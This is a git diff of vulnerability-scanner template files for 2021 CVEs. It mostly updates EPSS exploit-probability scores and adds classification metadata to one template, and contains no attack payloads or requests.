a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40859 epss-score: 0.02655 - epss-percentile: 0.89037 + epss-percentile: 0.89182 cpe: cpe:2.3:o:auerswald:compact_5500r_firmware:7.8a:build002:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 42ecdec156..8692e04528 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40868 cwe-id: CWE-79 - epss-score: 0.00264 - epss-percentile: 0.63286 + epss-score: 0.00266 + epss-percentile: 0.63861 cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 2d22faadcc..e136d69c20 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40870 cwe-id: CWE-23 - epss-score: 0.95606 - epss-percentile: 0.99146 + epss-score: 0.90116 + epss-percentile: 0.98432 cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index bb753f3e66..6bae6ca34f 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40875 cwe-id: CWE-425 - epss-score: 0.04429 - epss-percentile: 0.91335 + epss-score: 0.11149 + epss-percentile: 0.94521 cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index ecfd51a15d..e9822395e0 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-40908 cwe-id: CWE-89 - epss-score: 0.01192 - epss-percentile: 0.83381 + epss-score: 0.02852 + epss-percentile: 0.89545 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 41afc07e10..66430f0551 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-40960 cwe-id: CWE-22 epss-score: 0.01168 - epss-percentile: 0.83172 + epss-percentile: 0.83369 cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 41683eb901..8335a40e44 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40968 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 3628085e9a..62dade9591 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40969 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 77dd29a3b9..d5d50cdf9e 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40970 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 63bd9b481b..6e063160dd 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40971 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 6a2086118c..08c1ebdc24 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40972 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 9e0b955c9d..e7ada034ec 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00158 - epss-percentile: 0.51596 + epss-percentile: 0.51979 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index 77cf0aed79..cc440691c6 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-40978 cwe-id: CWE-22 epss-score: 0.04273 - epss-percentile: 0.91189 + epss-percentile: 0.91287 cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 7cacd46105..d034ab6f2f 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41174 cwe-id: CWE-79 epss-score: 0.96462 - epss-percentile: 0.99384 + epss-percentile: 0.99422 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index 8a76137bf6..b5fbe49dc7 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41192 cwe-id: CWE-1188 epss-score: 0.00805 - epss-percentile: 0.79527 + epss-percentile: 0.79761 cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index 0c814aa2af..30d07f6eb1 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41266 cwe-id: CWE-306 epss-score: 0.04636 - epss-percentile: 0.91526 + epss-percentile: 0.91649 cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 33f0ae7f1a..772d676c0c 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41277 cwe-id: CWE-200,CWE-22 - epss-score: 0.95953 - epss-percentile: 0.99232 + epss-score: 0.11624 + epss-percentile: 0.94638 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 74ee536457..890fb7236b 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-41282 cwe-id: CWE-74 - epss-score: 0.97136 - epss-percentile: 0.99688 + epss-score: 0.97233 + epss-percentile: 0.99772 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index 447b11884e..f204ab6701 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41291 cwe-id: CWE-22 - epss-score: 0.11826 - epss-percentile: 0.94586 + epss-score: 0.0476 + epss-percentile: 0.9176 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index 53237b9524..40a542cd17 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41293 cwe-id: CWE-22 - epss-score: 0.11826 - epss-percentile: 0.94586 + epss-score: 0.0476 + epss-percentile: 0.9176 cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index d193076532..078bf76a05 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-41349 - epss-score: 0.96426 - epss-percentile: 0.99374 + epss-score: 0.83718 + epss-percentile: 0.98062 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index f375519553..33b3137b76 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 - epss-score: 0.04909 - epss-percentile: 0.91773 + epss-score: 0.05943 + epss-percentile: 0.92596 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 9cd1751387..6dc16d10cd 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41432 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34562 + epss-percentile: 0.34929 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 8be3f53307..6546c51f9f 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41460 cwe-id: CWE-89 epss-score: 0.01115 - epss-percentile: 0.82751 + epss-percentile: 0.82933 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 2da83eb852..ba513c0690 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41467 cwe-id: CWE-79 epss-score: 0.00138 - epss-percentile: 0.48606 + epss-percentile: 0.48975 cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index b4f316a289..eb5380a771 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41569 cwe-id: CWE-829 epss-score: 0.00978 - epss-percentile: 0.81497 + epss-percentile: 0.81699 cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index 3835904f12..26c9e66ee1 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 - epss-score: 0.04318 - epss-percentile: 0.91227 + epss-score: 0.04501 + epss-percentile: 0.91516 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index bc51435845..6a886ee468 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41649 cwe-id: CWE-89 - epss-score: 0.03215 - epss-percentile: 0.89928 + epss-score: 0.0339 + epss-percentile: 0.90321 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index dc3744cfb3..bde29339ed 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.95457 - epss-percentile: 0.99108 + epss-score: 0.95374 + epss-percentile: 0.99131 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index c282c74ca7..6b1cff8a02 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -9,17 +9,23 @@ info: reference: - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d - https://nvd.nist.gov/vuln/detail/CVE-2021-41749 + - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md classification: - cve-id: CVE-2021-41749 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2021-41749 cwe-id: CWE-94 + epss-score: 0.2727 + epss-percentile: 0.96226 + cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: nystudio107 + product: seomatic + framework: craft_cms shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' tags: cve,cve2021,craftcms,cms,ssti - variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 663b8071f4..18379ebd12 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 - epss-score: 0.97532 - epss-percentile: 0.99986 + epss-score: 0.97472 + epss-percentile: 0.99955 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index e5c883f49a..350c23dc4f 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-41826 cwe-id: CWE-601 epss-score: 0.93913 - epss-percentile: 0.988 + epss-percentile: 0.9886 cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 11c019b1ff..85ed09226f 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-41878 cwe-id: CWE-79 - epss-score: 0.00476 - epss-percentile: 0.72656 + epss-score: 0.00675 + epss-percentile: 0.77523 cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 3dd5b5aa58..3a3c492c1a 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-4191 cwe-id: CWE-287 - epss-score: 0.46947 - epss-percentile: 0.96965 + epss-score: 0.19172 + epss-percentile: 0.95672 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index 560c718c0c..207c969a41 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-41951 cwe-id: CWE-79 epss-score: 0.74732 - epss-percentile: 0.97725 + epss-percentile: 0.97774 cpe: cpe:2.3:a:montala:resourcespace:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 4a578010b4..f67cf31bec 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-42013" cwe-id: CWE-22 - epss-score: 0.97515 - epss-percentile: 0.99973 + epss-score: 0.97391 + epss-percentile: 0.99887 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index 1058575ca9..b17fd1e34a 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 - epss-score: 0.00377 - epss-percentile: 0.69374 + epss-score: 0.00491 + epss-percentile: 0.73387 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 1ee17577c8..3b289c9278 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42071 cwe-id: CWE-78 - epss-score: 0.9564 - epss-percentile: 0.99153 + epss-score: 0.95761 + epss-percentile: 0.99225 cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index 219a8d0528..23cde1b8df 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42192 cwe-id: CWE-863 epss-score: 0.0106 - epss-percentile: 0.82302 + epss-percentile: 0.82468 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index e3fdf71b0f..b69eae8e92 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42237 cwe-id: CWE-502 - epss-score: 0.97532 - epss-percentile: 0.99984 + epss-score: 0.97286 + epss-percentile: 0.99809 cpe: cpe:2.3:a:sitecore:experience_platform:7.5:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index a881d09707..daa0b9cc91 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42258 cwe-id: CWE-89 - epss-score: 0.97388 - epss-percentile: 0.99868 + epss-score: 0.97375 + epss-percentile: 0.99872 cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index e4adce3814..5ff48a462d 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.46073 + epss-percentile: 0.4643 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index bafb5e3a38..0d6b6b33f7 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-42565 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 58549fb59a..f35f49eaf8 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-42566 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40864 + epss-percentile: 0.41167 cpe: cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index bac0122b2c..8660b141be 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.25981 - epss-percentile: 0.961 + epss-percentile: 0.96155 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 5f49502e4e..847333fed4 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42627 - epss-score: 0.05762 - epss-percentile: 0.92386 + epss-score: 0.05731 + epss-percentile: 0.92466 cpe: cpe:2.3:o:dlink:dir-615_firmware:20.06:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 3126a0e8a6..ffd8104bea 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.44596 + epss-percentile: 0.44984 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index bf9a1eb071..4e29edf2d0 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42667 cwe-id: CWE-89 - epss-score: 0.02869 - epss-percentile: 0.89414 + epss-score: 0.03095 + epss-percentile: 0.8991 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index eb95710aca..935ff02a27 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-42887 cwe-id: CWE-287 - epss-score: 0.01827 - epss-percentile: 0.86733 + epss-score: 0.02247 + epss-percentile: 0.88294 cpe: cpe:2.3:o:totolink:ex1200t_firmware:4.1.2cu.5215:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 725e9dc8ee..6617eb704a 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-43062 cwe-id: CWE-79 - epss-score: 0.00465 - epss-percentile: 0.72371 + epss-score: 0.00617 + epss-percentile: 0.76371 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index e749adfb06..aef2d68d44 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43287 cwe-id: CWE-200 - epss-score: 0.70378 - epss-percentile: 0.97594 + epss-score: 0.61676 + epss-percentile: 0.9743 cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index d42bd75e26..263fdb1f45 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 - epss-score: 0.02563 - epss-percentile: 0.88849 + epss-score: 0.04351 + epss-percentile: 0.91366 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 24744107e7..198c3b73db 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-43495 cwe-id: CWE-22 epss-score: 0.05064 - epss-percentile: 0.91909 + epss-percentile: 0.92013 cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index 14e29c8236..665332cbb6 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-43496 cwe-id: CWE-22 - epss-score: 0.05064 - epss-percentile: 0.91909 + epss-score: 0.06749 + epss-percentile: 0.93062 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff 